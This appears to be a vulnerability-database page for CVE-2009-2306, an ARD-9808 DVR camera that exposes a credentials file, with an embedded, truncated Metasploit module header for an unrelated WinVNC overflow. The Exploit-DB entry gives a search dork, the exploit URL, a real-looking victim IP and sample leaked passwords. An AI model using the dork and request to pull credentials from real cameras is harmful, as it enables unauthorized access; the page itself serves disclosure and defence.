CVE-2009-2306
published 2009-07-02CVE-2009-2306: The ARD-9808 DVR card security camera stores sensitive information under the web root with insufficient access control, which allows remote attackers to…
PriorityP348high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.08%
79.2th percentile
The ARD-9808 DVR card security camera stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a file containing usernames and passwords via a direct request for dvr.ini.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WinVNC Web Server 3.3.3r7 - GET Overflow (Metasploit)
exploitdb·2009-12-06
CVE-2001-0168 WinVNC Web Server 3.3.3r7 - GET Overflow (Metasploit)
WinVNC Web Server 3.3.3r7 - GET Overflow (Metasploit)
---
##
# $Id: winvnc_http_get.rb 7724 2009-12-06 05:50:37Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'WinVNC Web Server %q{
This module exploits a buffer overflow in the AT&T WinVNC version
'patrick',
'License' => MSF_LICENSE,
'Version' => '$Revision: 7724 $',
'References' =>
[
[ 'BID', '2306' ],
[ 'OSVDB', '6280' ],
[ 'CVE', '2001-0168' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 979,
'BadChars' => "\x00\x09\x0a\x0
Exploit-DB
ARD-9808 DVR Card Security Camera - Arbitrary Configuration Disclosure
exploitdb·2009-07-01
CVE-2009-2306 ARD-9808 DVR Card Security Camera - Arbitrary Configuration Disclosure
ARD-9808 DVR Card Security Camera - Arbitrary Configuration Disclosure
---
SoftWare Name : ARD-9808 DVR Card Security Camera Passwords View Bug
Author : Septemb0x
Web Site : www.ozkanbozkurt.com
Procuts Site : http://www.armassa.com.tr/shop/category.php?sid=C2B7D6B59AF75CF88011987A080A46FD&id=87789673
Software Download : http://www.armassa.com.tr/shop/down/ard9808.rar = Open To Rar > DVR > Dvr.ini
D0rk : "To enable control work: Tools->Internet Options->Security->Custom Level Reset to: Low Or Download"
Exploit: http://[sitename-ipadress]/dvr.ini
Example: http://88.249.248.177/dvr.ini
Show;
[PASSWORD]
administrator=
password_a=
user=
password=
enable=0
user0=ozcan = Camera Username
password0=3893 = Camera Password
right0=223
encode=1
num=2
user1=yurt
password1=yurt
right1=223
.
.
.
... Lo
No writeups or analysis indexed.
2009-07-02
Published